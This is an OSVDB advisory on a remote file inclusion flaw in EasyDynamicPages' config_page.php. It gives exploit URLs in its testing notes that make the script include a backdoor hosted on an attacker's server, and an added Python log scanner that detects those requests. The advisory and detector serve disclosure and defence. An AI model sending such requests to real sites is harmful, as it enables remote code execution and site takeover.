EasyDynamicPages config_page.php Arbitrary Command Execution

2004-01-02T00:00:00
ID OSVDB:3408
Type osvdb
Reporter OSVDB
Modified 2004-01-02T00:00:00

Description

Vulnerability Description

EasyDynamicPages contains a flaw that may allow a malicious user to execute arbitrary code on a vulnerable system. The issue is triggered by a specially crafted URL request to the "config_page.php" script. It is possible that the flaw may allow arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround:

Protect the "dynamicpages/fast" folder with .htaccess or similar to ensure that only trusted users can access it.

Manual Testing Notes

Exploit: http://victim/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://attacker/

If the attacker hosts a script backdoor at the URL: http://attacker/admin/site_settings.php

Then the attacker requests: http://victim/dynamicpages/fast/config_page.php?do=add_page&du=dpage&edp_relative_path=http://attacker/
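As an added defender's example (not part of the OSVDB record or of the EasyDynamicPages project), the following Python scans Apache combined-format access-log lines for requests to config_page.php whose edp_relative_path parameter carries a remote URL, the request pattern shown in the testing notes above. The log lines, client addresses and hostnames are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Apache combined format); addresses and
# hostnames are documentation placeholders, not real indicators.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Jan/2004:10:11:12 +0000] "GET /dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://attacker.example/ HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [02/Jan/2004:10:12:01 +0000] "GET /dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=../ HTTP/1.0" 200 480 "-" "Mozilla/4.0"
192.0.2.9 - - [02/Jan/2004:10:13:44 +0000] "GET /index.php?page=home HTTP/1.0" 200 1024 "-" "Mozilla/4.0"
203.0.113.5 - - [02/Jan/2004:10:14:03 +0000] "GET /dynamicpages/fast/config_page.php?do=add_page&du=dpage&edp_relative_path=https%3A%2F%2Fattacker.example%2F HTTP/1.0" 200 512 "-" "Mozilla/4.0"
"""

# Fields of a combined-format line that matter for this check.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Any URL scheme (http://, https://, ftp://, ...) at the start of the value
# means the include path points off-host.
REMOTE_SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.IGNORECASE)

def is_remote_include_attempt(target: str) -> bool:
    """True if the request targets config_page.php with a remote edp_relative_path."""
    parts = urlsplit(target)
    if not parts.path.endswith("/dynamicpages/fast/config_page.php"):
        return False
    # parse_qs decodes one level of percent-encoding; unquote once more so a
    # double-encoded scheme is caught as well.
    for value in parse_qs(parts.query).get("edp_relative_path", []):
        if REMOTE_SCHEME_RE.match(unquote(value)):
            return True
    return False

def scan_access_log(text: str) -> list:
    """Return one finding per log line that looks like a remote-include attempt."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_remote_include_attempt(m.group("target")):
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "status": m.group("status"), "target": m.group("target")})
    return hits

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], hit["target"])
```

A 200 status on a flagged line is the case worth triaging first, since the workaround in the solution section should make such requests fail for untrusted clients.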

References:

Vendor URL: http://software.stoitsov.com/
Vendor URL: http://software.stoitsov.com/free/description.php?software=EasyDynamicPages
Secunia Advisory ID: 10535
Other Advisory URL: http://www.security-corporation.com/articles-20040103-001.html
Other Advisory URL: http://archives.neohapsis.com/archives/bugtraq/2004-01/0005.html
Nessus Plugin ID: 11976
Keyword: Remote File Inclusion
ISS X-Force ID: 14136
Bugtraq ID: 9338